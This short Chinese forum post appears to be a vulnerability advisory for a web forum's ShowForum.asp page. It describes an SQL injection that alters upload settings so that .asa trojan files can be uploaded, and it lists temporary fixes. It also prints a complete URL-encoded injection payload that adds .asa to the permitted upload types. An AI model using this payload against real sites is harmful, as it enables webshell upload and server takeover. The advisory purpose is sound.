漏洞于去年的一个下雨天，发现的。漏洞原理实用于ACCESS和SQL数据库。通过SQL语句改改上传设置，来达到上传木马的效果。主要是因为ShowForum.asp过滤不严。

　　该漏洞适用于现在绝大多数SQL版本。请做好防范。

　　官方补丁暂无。

　　 :临时解决方法：1、删除上传所要用到的2个文件。
　　　　　　　　　        2、在IIS里设置上传目录执行权限为（无）。

　　　下面是增加.asa上传的语句，仅供参考：

          ;order=id+DECLARE+@cmd+sysname+set+@cmd%3D0x7c00610073006100+update+clubconfig+set+UpFileGenre%3DupFileGenre%2B@cmd+select+*+from+%5Buser%5D+order+by+id&Submit=Submit

鉴于该漏洞的危害性较大，本文章置顶一星期，望有使用者从速修补。--By IFriend